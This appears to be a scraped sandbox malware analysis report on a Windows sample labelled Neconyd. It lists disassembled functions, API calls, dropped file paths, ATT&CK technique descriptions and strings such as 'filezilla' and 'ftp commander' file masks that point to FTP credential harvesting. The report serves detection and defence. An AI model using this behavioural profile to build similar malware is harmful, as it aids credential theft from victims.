Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: CountMessageTick$DispatchPeekSleep
String ID:
API String ID: 4159783438-0
Opcode ID: ab27e8fd20f0983608bc295b19996ec13099b56f87bcdccced181fb1a6008d05
Instruction ID: 2f378a1af0056e794f94b22e0cd08b0b0b180d2e60cd5d2ebdc62f673b65dbb1
Opcode Fuzzy Hash: ab27e8fd20f0983608bc295b19996ec13099b56f87bcdccced181fb1a6008d05
Instruction Fuzzy Hash: D1F0C872D042149BD714B7F2DD09B7D76A89B45714F104A36F551F70D1CA7CCD148A58

Function 00408692 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 152COMMON

Download Yara Rule

APIs

Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551

Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5B
Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5F
Part of subcall function 00409F2B: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
Part of subcall function 00409F2B: DispatchMessageW.USER32(?), ref: 00409F80
Part of subcall function 00409F2B: Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D

CharLowerW.USER32(?,?,?,00423DD4,?,00000001), ref: 00408751
SysFreeString.OLEAUT32(?), ref: 0040875A

Strings

http://, xrefs: 00408711
+@, xrefs: 004086A0

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: CountInternetMessageTick$CharDispatchFreeLowerOpenOptionPeekSleepString
String ID: http://$+@
API String ID: 147727044-3628382792
Opcode ID: 6e9e626a4613c0855f5347982540e942ed1617b6e834c0e4f94aa1f1be06abb5
Instruction ID: 305e6509dfdc939f3ffb47eba37a7af79922f54013ecb7534e3961c93d2e4cc1
Opcode Fuzzy Hash: 6e9e626a4613c0855f5347982540e942ed1617b6e834c0e4f94aa1f1be06abb5
Instruction Fuzzy Hash: 4E41D5729002199BCF15AF66CD056EFBBB4FF44314F20447FE981B3292DB3889528B99

Function 00407D61 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 81fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(00414F68,00000000,00000000,00000000,UniqueNum,00000001), ref: 00407E09
WriteFile.KERNEL32(00000078,00000064,00000001,00000000), ref: 00407E20

Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48

Strings

x, xrefs: 00407DEF
UniqueNum, xrefs: 00407D86

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: File$CreateModuleNamePointerWrite
String ID: UniqueNum$x
API String ID: 594998759-2399716736
Opcode ID: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
Instruction ID: 8c5cde1ed6458afa5e70834db293a7f07ca8c6efd1b8e13f0da2095665a79c5a
Opcode Fuzzy Hash: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
Instruction Fuzzy Hash: F72129329002186BDF04AB74ED49DDF3B69EF44315F104636FA02E71E1E634D951C799

Function 004040E7 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 60COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 0040413A

Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9

Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D

Strings

&, xrefs: 00404110
*filezilla*, xrefs: 004040F6
#, xrefs: 0040411E

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
String ID: #$&$*filezilla*
API String ID: 3438805939-758400021
Opcode ID: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
Instruction ID: af0dd5899ef73ee7264a7e51d90439c8fcf38b6470501fb51340e8e2557856c3
Opcode Fuzzy Hash: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
Instruction Fuzzy Hash: 8E1151B2901128BADB10EA92DC49EDF7BBCEF85304F00407AF605B6080E7385785CBE9

Function 00404A92 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 60COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 00404AE5

Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9

Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D

Strings

&, xrefs: 00404ABB
#, xrefs: 00404AC9
ftp*commander*, xrefs: 00404AA1

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
String ID: #$&$ftp*commander*
API String ID: 3438805939-1149875651
Opcode ID: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
Instruction ID: 4761086559ade70d73b1403ca51e5d3bc462c500c99379e4fd01d7d946a964d6
Opcode Fuzzy Hash: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
Instruction Fuzzy Hash: B61121B2901118BADB10AA92DC49EDF7F7CEF85704F00407AF609B6180E7799785CBA9

Function 00409445 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 004094A9
SysFreeString.OLEAUT32(?), ref: 004094AE

Strings

an.yandex.ru/count, xrefs: 00409478
_blank, xrefs: 0040948E

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: FreeString
String ID: _blank$an.yandex.ru/count
API String ID: 3341692771-25359924
Opcode ID: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
Instruction ID: 1eacecae91598e8b756cf85833a4a3bbf756f1dfdfc5fa02fd6c22f827bf3b29
Opcode Fuzzy Hash: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
Instruction Fuzzy Hash: 28015A35204114BBDB109FA6CD05D9B77A8EF85324724443BBC15E7291E779EE02CA69

Function 00406C77 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 26registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Internet Explorer,00000000,00000001,00000000,?,?,00402C77), ref: 00406C91

Strings

SOFTWARE\Microsoft\Internet Explorer, xrefs: 00406C87
w,@, xrefs: 00406CA0
Build, xrefs: 00406CA6

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: Open
String ID: Build$SOFTWARE\Microsoft\Internet Explorer$w,@
API String ID: 71445658-3061378640
Opcode ID: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
Instruction ID: 930cfdd3d9e2cf302383723a85cc45ac24d6ba1b6d45bcf7a76994dd36721e6e
Opcode Fuzzy Hash: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
Instruction Fuzzy Hash: FBE08672664218FAEF009B929C07FDA77ACDB00758F20086AF502F10C1DAB5F714D6AC

Function 0040848F Relevance: 6.1, APIs: 4, Instructions: 81memoryregistryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5

Part of subcall function 0040845D: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000008,00000000,?,?,004084C5,?,?,?,00000008,?,00403796,?), ref: 00408475
Part of subcall function 0040845D: RegCloseKey.ADVAPI32(?,?,004084C5,?,?,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408484

ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408524
GetProcessHeap.KERNEL32(00000000,00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408534
HeapFree.KERNEL32(00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 0040853B

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: Heap$CloseEnvironmentExpandFreeOpenProcessQueryStringsValue
String ID:
API String ID: 3604167287-0
Opcode ID: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
Instruction ID: 704a8cbe2313c99ccb7bf4cac6d27c9c5720caa44ca6f9902b9fd9ccb38d811f
Opcode Fuzzy Hash: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
Instruction Fuzzy Hash: 0521C871900626BBDF205B748E45ABF3668EF05328F10063EF561F22D0EB758D508658

Function 00409581 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

CharLowerW.USER32(00408E44,00000000,00000000,?,00408E44,00408795), ref: 004095A4
CharLowerW.USER32(00408795), ref: 004095D8
SysFreeString.OLEAUT32(00408795), ref: 00409608
SysFreeString.OLEAUT32(00408E44), ref: 0040960D

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: CharFreeLowerString
String ID:
API String ID: 2335467167-0
Opcode ID: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
Instruction ID: 6911929459278785efe31e607170db17e103bee024a9a22ae291265c1613d99e
Opcode Fuzzy Hash: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
Instruction Fuzzy Hash: 20116D72D00108BBDB019F9ADC85B9E7BB8EF44305F1544BAE405F21A1D779AE409F44

Function 00408091 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081A3

Strings

-, xrefs: 00408140

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: -
API String ID: 885266447-2547889144
Opcode ID: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
Instruction ID: cbf3f064ca1262f0759db58cdf0f181467b31290bd4ebff5f053a9a619aca6df
Opcode Fuzzy Hash: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
Instruction Fuzzy Hash: 58415D31D0422699CB2177B98E417BB61A9DF44758F1440BFF9C0B72C2EEBC5D8581AE

Function 00409837 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00409868
SysAllocString.OLEAUT32(?), ref: 00409876

Strings

"URL", xrefs: 00409838

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: AllocString
String ID: "URL"
API String ID: 2525500382-1734660058
Opcode ID: dde5973fb88290fc179560dd033cd143229de4e8b937af87662ad62248fcd5ae
Instruction ID: a1d8355846c3e17605cb56d648b2f311708773d78851072204e2f77cd01d539a
Opcode Fuzzy Hash: dde5973fb88290fc179560dd033cd143229de4e8b937af87662ad62248fcd5ae
Instruction Fuzzy Hash: E9F0A77650011997CF00AF64CC00ED637E9BB84348F0444B7E904E7240D974D9058F54

Function 004097BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 004097ED
SysAllocString.OLEAUT32(?), ref: 004097FB

Strings

"domain", xrefs: 004097BD

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: AllocString
String ID: "domain"
API String ID: 2525500382-3540696003
Opcode ID: 8e4162beac9bb0746109323da30f0d67e223eba2bd2c583220c59dcd4726db76
Instruction ID: 2ab7b57618223888890007651f958d72a6f850cfddda49e7e7e9e9b765f43e97
Opcode Fuzzy Hash: 8e4162beac9bb0746109323da30f0d67e223eba2bd2c583220c59dcd4726db76
Instruction Fuzzy Hash: AEF0A776500119ABCF00AF64CC04ED677E8BB84308F1444A7F908E7240EA7499058F50

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report bd0wJGTae5.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Neconyd

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\omsecor.exe

C:\Windows\SysWOW64\merocz.xc6

C:\Windows\SysWOW64\omsecor.exe

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Rich Headers

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
bd0wJGTae5.exe

Function 004075D4 Relevance: 22.6, APIs: 15, Instructions: 128
filememoryCOMMON

Function 0040ABD9 Relevance: 3.0, APIs: 2, Instructions: 26
fileCOMMON

Function 0040B346 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 153
sleepfileCOMMON

Function 0040AC20 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 49
registryCOMMON

Function 0040AAFD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42
COMMON

Function 00407727 Relevance: 6.1, APIs: 4, Instructions: 71
COMMON

Function 004077F0 Relevance: 3.0, APIs: 2, Instructions: 30
processCOMMON

Function 004069C0 Relevance: 3.0, APIs: 2, Instructions: 25
registryCOMMON

Function 004039EA Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 163
memoryCOMMON

Function 004032B8 Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 86
libraryloadermemoryCOMMON

Function 00402E3E Relevance: 26.6, APIs: 5, Strings: 10, Instructions: 309
COMMON

Function 0040B096 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 181
threadnetworkCOMMON

Function 00403C10 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 173
COMMON

Function 004027E6 Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 355
comCOMMON

Function 004041E4 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 210
registrymemoryCOMMON